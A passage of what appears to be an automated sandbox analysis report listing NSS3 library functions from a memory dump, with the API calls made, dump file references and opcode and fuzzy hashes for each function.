                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C702F81
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 287051776-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                                                                                                                                                                                                                          • Instruction ID: 0b15b4a666ea30881fbb2dc1094a46d8748fd4ea5de6e09de2a0db236b7806fd
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E13104F27011008AE710C665CE4CFAE73E9EF81398F64097AD52997AD1EB31A94AC711
                                                                                                                                                                                                                                                                                          Function 6C6F0E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CERT_DecodeAVAValue.NSS3(?,?,6C6F0A2C), ref: 6C6F0E0F
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C6F0A2C), ref: 6C6F0E73
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C6F0A2C), ref: 6C6F0E85
                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(00000001,?,?,6C6F0A2C), ref: 6C6F0E90
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6F0EC4
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C6F0A2C), ref: 6C6F0ED9
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3618544408-0
                                                                                                                                                                                                                                                                                          • Opcode ID: a0127984f13f77dd6bdcd6b976fdb2fb87ee49b55a91e5a7b8e071ad47c529e0
                                                                                                                                                                                                                                                                                          • Instruction ID: b1846a2d398dc085df42fb66206b7d549c94264fff13a3d69752facd0c5b0b57
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0127984f13f77dd6bdcd6b976fdb2fb87ee49b55a91e5a7b8e071ad47c529e0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD214076F0128557EB10896A9C85BBB72AFEFC274CF194435D93C93A02EB70C81782A5
                                                                                                                                                                                                                                                                                          Function 6C6FAE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C6FAEB3
                                                                                                                                                                                                                                                                                          • SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C6FAECA
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6FAEDD
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE022,00000000), ref: 6C6FAF02
                                                                                                                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C819500), ref: 6C6FAF23
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C74F0C8
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C74F122
                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6FAF37
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3714604333-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 85ca9d93472cd4467a1a7e3cca8c51f549566134cc5090442cb398c104b5e2d1
                                                                                                                                                                                                                                                                                          • Instruction ID: 18157674b10a6bf53af6bbe4575aebdbd6c844f5fcf794fe63a6c82c5ac8e036
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85ca9d93472cd4467a1a7e3cca8c51f549566134cc5090442cb398c104b5e2d1
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22217CB19093009BFB108E189D45B9A7BE5AF8532CF148318FC64AF7D2E731D50687AB
                                                                                                                                                                                                                                                                                          Function 6C77EE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C77EE85
                                                                                                                                                                                                                                                                                          • realloc.MOZGLUE(0318EBCC,?), ref: 6C77EEAE
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6C77EEC5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750BE0: malloc.MOZGLUE(6C748D2D,?,00000000,?), ref: 6C750BF8
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750BE0: TlsGetValue.KERNEL32(6C748D2D,?,00000000,?), ref: 6C750C15
                                                                                                                                                                                                                                                                                          • htonl.WSOCK32(?), ref: 6C77EEE3
                                                                                                                                                                                                                                                                                          • htonl.WSOCK32(00000000,?), ref: 6C77EEED
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C77EF01
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1351805024-0
                                                                                                                                                                                                                                                                                          • Opcode ID: eb044289acfcc3581fbc388816b19d2ef96fbc5ab143c593d438ed547eb42c80
                                                                                                                                                                                                                                                                                          • Instruction ID: 10c61b055cef5eb063810a93ddef8098c27e15bdcef41fe528668bc8c4e19981
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb044289acfcc3581fbc388816b19d2ef96fbc5ab143c593d438ed547eb42c80
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D21B171A002189FDF20DF28DD84A9AB7A8EF45358F158539EC199B642E730E814CBF2
                                                                                                                                                                                                                                                                                          Function 6C72EE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C72EE49
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FAB0: free.MOZGLUE(?,-00000001,?,?,6C6EF673,00000000,00000000), ref: 6C74FAC7
                                                                                                                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C72EE5C
                                                                                                                                                                                                                                                                                          • PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6C72EE77
                                                                                                                                                                                                                                                                                          • PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6C72EE9D
                                                                                                                                                                                                                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C72EEB3
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 886189093-0
                                                                                                                                                                                                                                                                                          • Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
                                                                                                                                                                                                                                                                                          • Instruction ID: ae8d5d5b28e07a0797a6a59ab59662c03d505218eb02370d5068ca4dc9d0e05a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA21D2B6A002146BEB118E68DD89EABB7ACEF49719F084174FE089B741E771DC1487F1
                                                                                                                                                                                                                                                                                          Function 6C6F7F50 Relevance: 9.1, APIs: 6, Instructions: 76memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C6F7F68
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6F87ED,00000800,6C6EEF74,00000000), ref: 6C751000
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: PR_NewLock.NSS3(?,00000800,6C6EEF74,00000000), ref: 6C751016
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: PL_InitArenaPool.NSS3(00000000,security,6C6F87ED,00000008,?,00000800,6C6EEF74,00000000), ref: 6C75102B
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000002C), ref: 6C6F7F7B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C7510F3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: EnterCriticalSection.KERNEL32(?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75110C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PL_ArenaAllocate.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751141
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PR_Unlock.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751182
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75119C
                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C6F7FA7
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C748D2D,?,00000000,?), ref: 6C74FB85
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C74FBB1
                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C81919C,?), ref: 6C6F7FBB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8218D0,?), ref: 6C74B095
                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6F7FCA
                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(00000000,-00000004,6C81915C,00000014), ref: 6C6F7FFE
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Arena$Item_$Alloc_Arena_DecodeQuickValue$AllocateCopyCriticalEnterErrorFreeInitLockPoolSectionUnlockcallocmemcpy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1489184013-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 38377db331dfcc1c71d7c27582b7e33ad4644c447a175e957378f0c7a7c44d14
                                                                                                                                                                                                                                                                                          • Instruction ID: b0532e264e712965ac0e2d7f330d63ba287fc960010d137b7cff1e7c4524491b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38377db331dfcc1c71d7c27582b7e33ad4644c447a175e957378f0c7a7c44d14
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A1136B1D012045BF7209A359E48BBB72E9DF4565DF00062DFC69D2B81FB20A949C2BA
                                                                                                                                                                                                                                                                                          Function 6C6FBE50 Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800,6C77DC29,?), ref: 6C6FBE64
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6F87ED,00000800,6C6EEF74,00000000), ref: 6C751000
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: PR_NewLock.NSS3(?,00000800,6C6EEF74,00000000), ref: 6C751016
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: PL_InitArenaPool.NSS3(00000000,security,6C6F87ED,00000008,?,00000800,6C6EEF74,00000000), ref: 6C75102B
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,?,6C77DC29,?), ref: 6C6FBE78
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C7510F3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: EnterCriticalSection.KERNEL32(?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75110C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PL_ArenaAllocate.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751141
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PR_Unlock.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751182
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75119C
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,?,?,?,?,6C77DC29,?), ref: 6C6FBE96
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PL_ArenaAllocate.NSS3(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75116E
                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,?,6C77DC29,?), ref: 6C6FBEBB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C748D2D,?,00000000,?), ref: 6C74FB85
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C74FBB1
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,?,6C77DC29,?), ref: 6C6FBEDF
                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,6C77DC29,?), ref: 6C6FBEF3
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ArenaUtil$Alloc_$AllocateArena_Value$CopyCriticalEnterErrorFreeInitItem_LockPoolSectionUnlockcallocmemcpy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3111646008-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
                                                                                                                                                                                                                                                                                          • Instruction ID: b24318cae92cce035a37aa9afe6c6bced8d658fcc9ff9f375cc1f60330796b5d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2411E771F002055BEB008B64ED09FAF37A9EF85399F544028ED18EB780EB31D91AC7A5
                                                                                                                                                                                                                                                                                          Function 6C783C80 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C785B40: PR_GetIdentitiesLayer.NSS3 ref: 6C785B56
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C783D3F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6FBA90: PORT_NewArena_Util.NSS3(00000800,6C783CAF,?), ref: 6C6FBABF
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6FBA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6C783CAF,?), ref: 6C6FBAD5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6FBA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6C783CAF,?), ref: 6C6FBB08
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6FBA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C783CAF,?), ref: 6C6FBB1A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6FBA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6C783CAF,?), ref: 6C6FBB3B
                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C783CCB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: TlsGetValue.KERNEL32 ref: 6C7B90AB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: TlsGetValue.KERNEL32 ref: 6C7B90C9
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: EnterCriticalSection.KERNEL32 ref: 6C7B90E5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: TlsGetValue.KERNEL32 ref: 6C7B9116
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: LeaveCriticalSection.KERNEL32 ref: 6C7B913F
                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C783CE2
                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C783CF8
                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C783D15
                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C783D2E
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4030862364-0
                                                                                                                                                                                                                                                                                          • Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                                                                                                                                                                                                                                                          • Instruction ID: a7b52b5384f91f9eedc30cce781e111a50b18e743f7594a0bc4063fc9c01e67e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF115B756026006FE7205E2DFD46B8BB3F4EF21208F404134E61A97B21F632F819C266
                                                                                                                                                                                                                                                                                          Function 6C74FDF0 Relevance: 9.1, APIs: 6, Instructions: 60memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
